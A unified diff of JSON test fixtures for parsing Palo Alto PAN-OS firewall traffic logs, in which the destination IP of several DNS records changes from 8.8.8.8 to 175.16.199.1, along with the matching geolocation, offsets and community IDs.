@@ -5551,7 +5355,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -5563,12 +5367,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 23504, + "log.offset": 23734, "network.application": "dns", "network.bytes": 228, "network.community_id": [ - "1:jK1/samUe1w5J1uVlmH7SIXX1YE=", - "1:lz0ZCL4R4wwyqmvefpkiJk7yR18=" + "1:YBygWfVh+uJolv6zNydx888KbBc=", + "1:v3ioLfu0OhYbpmhlhNN2kLb6irc=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -5585,12 +5389,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24093", - "panw.panos.network.nat.community_id": "1:lz0ZCL4R4wwyqmvefpkiJk7yR18=", + "panw.panos.network.nat.community_id": "1:YBygWfVh+uJolv6zNydx888KbBc=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091162, "panw.panos.source.interface": "ethernet1/2", @@ -5605,14 +5409,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 144, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -5637,17 +5441,18 @@ "client.nat.port": 14247, "client.packets": 1, "client.port": 50443, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 206, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -5661,7 +5466,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -5673,12 +5478,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 23953, + "log.offset": 24193, "network.application": "dns", "network.bytes": 337, "network.community_id": [ - "1:DkOVz0BGrlh9OPZZ8+58eugW7gU=", - "1:pe+tF7SEY/Km9LRsrGI4UWHmV8E=" + "1:YJceH5rZcz1VbKygrm/qccp9Ess=", + "1:w8XnxnTMQAhm5sOtGkm43MuGB1Y=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -5695,12 +5500,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24117", - "panw.panos.network.nat.community_id": "1:DkOVz0BGrlh9OPZZ8+58eugW7gU=", + "panw.panos.network.nat.community_id": "1:YJceH5rZcz1VbKygrm/qccp9Ess=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091163, "panw.panos.source.interface": "ethernet1/2", @@ -5715,14 +5520,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 206, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -5747,17 +5552,18 @@ "client.nat.port": 33580, "client.packets": 1, "client.port": 54215, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 206, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -5771,7 +5577,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -5783,12 +5589,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 24403, + "log.offset": 24653, "network.application": "dns", "network.bytes": 337, "network.community_id": [ - "1:qHh6xeCGBZ5pLwaBsFDRVbP5MZU=", - "1:twx1eOqehbazvI0g0nkTeVynrY0=" + "1:MaNPtaexrtBDiK1FqZV47sf+niI=", + "1:t6loEqKMys5Konp+NIaNnuyNaT8=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -5805,12 +5611,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24142", - "panw.panos.network.nat.community_id": "1:twx1eOqehbazvI0g0nkTeVynrY0=", + "panw.panos.network.nat.community_id": "1:MaNPtaexrtBDiK1FqZV47sf+niI=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091164, "panw.panos.source.interface": "ethernet1/2", @@ -5825,14 +5631,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 206, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -5857,17 +5663,18 @@ "client.nat.port": 13498, "client.packets": 1, "client.port": 35827, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 169, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -5881,7 +5688,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -5893,12 +5700,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 24853, + "log.offset": 25113, "network.application": "dns", "network.bytes": 252, "network.community_id": [ - "1:7yZMN4i1Gxii2+FmEtBbvDk3lvA=", - "1:hcgjXpi+ne3QnFDBLeskkVg4V+M=" + "1:IIfOFVIY3zfc25N4A7SFL5AUzm8=", + "1:WD+GaCUhMujDfHSy7AUahHp1vWw=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -5915,12 +5722,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24195", - "panw.panos.network.nat.community_id": "1:hcgjXpi+ne3QnFDBLeskkVg4V+M=", + "panw.panos.network.nat.community_id": "1:WD+GaCUhMujDfHSy7AUahHp1vWw=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091165, "panw.panos.source.interface": "ethernet1/2", @@ -5935,14 +5742,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 169, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -5967,17 +5774,18 @@ "client.nat.port": 20365, "client.packets": 1, "client.port": 60609, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 132, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -5991,7 +5799,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -6003,12 +5811,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 25302, + "log.offset": 25572, "network.application": "dns", "network.bytes": 232, "network.community_id": [ - "1:0vV/bWp15XA8ntbAvsV9+ktbx6E=", - "1:C91XK45Q10iqwwp4XYM+Wg1Ua8A=" + "1:bCQJCkKJt9w1kBS55QCraj9ey+M=", + "1:qPlhIGArJXmoBhQVuxsknAhz2gI=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -6025,12 +5833,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24124", - "panw.panos.network.nat.community_id": "1:C91XK45Q10iqwwp4XYM+Wg1Ua8A=", + "panw.panos.network.nat.community_id": "1:bCQJCkKJt9w1kBS55QCraj9ey+M=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091166, "panw.panos.source.interface": "ethernet1/2", @@ -6045,14 +5853,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 132, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -6077,17 +5885,18 @@ "client.nat.port": 61464, "client.packets": 1, "client.port": 3248, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 127, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -6101,7 +5910,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -6113,12 +5922,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 25752, + "log.offset": 26032, "network.application": "dns", "network.bytes": 206, "network.community_id": [ - "1:hsTAFtOdeb7+Ofe152B+9h69mbE=", - "1:v2Rn2HMvdhM3B2CXYva9UePt+Og=" + "1:iZ6cuDEytPuGtD80pU/7es+QhfI=", + "1:pCKdrcOhkESfAZbDDUbNx9zHb+E=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -6135,12 +5944,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24153", - "panw.panos.network.nat.community_id": "1:hsTAFtOdeb7+Ofe152B+9h69mbE=", + "panw.panos.network.nat.community_id": "1:pCKdrcOhkESfAZbDDUbNx9zHb+E=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091167, "panw.panos.source.interface": "ethernet1/2", @@ -6155,14 +5964,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 127, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -6187,17 +5996,18 @@ "client.nat.port": 42877, "client.packets": 1, "client.port": 49284, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 105, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -6211,7 +6021,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -6223,12 +6033,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 26200, + "log.offset": 26490, "network.application": "dns", "network.bytes": 194, "network.community_id": [ - "1:htOXUg3QOGd0fpgLjYzQlvRMzUQ=", - "1:tO559KwdaAXfBh7HmZSLp9/JUJQ=" + "1:/QRiz8XrvAKWvL7InyO5YWn7Unw=", + "1:zALUieRh+c7GcKa4k74kugaW5NQ=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -6245,12 +6055,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24122", - "panw.panos.network.nat.community_id": "1:htOXUg3QOGd0fpgLjYzQlvRMzUQ=", + "panw.panos.network.nat.community_id": "1:/QRiz8XrvAKWvL7InyO5YWn7Unw=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091168, "panw.panos.source.interface": "ethernet1/2", @@ -6265,14 +6075,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.196", - "8.8.8.8" + "192.168.15.196" ], "rule.name": "new_outbound_from_trust", "server.bytes": 105, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -6297,17 +6107,18 @@ "client.nat.port": 5918, "client.packets": 1, "client.port": 57732, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 172, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -6321,7 +6132,7 @@ "event.end": "2018-11-30T16:09:13.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:13.000-02:00", "event.timezone": "-02:00", @@ -6333,12 +6144,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 26649, + "log.offset": 26949, "network.application": "dns", "network.bytes": 269, "network.community_id": [ - "1:aMEfJV/f54B1+0RNtWjw49JfNFU=", - "1:gHWCOTtilTTqOn7fOKh7zVq45Xw=" + "1:XeWsMGIbT/x162pVo0NCV89u0gM=", + "1:uD+W7tTSk79NUi3PpwMi06q1UWI=" ], "network.direction": "outbound", "network.packets": 2, 
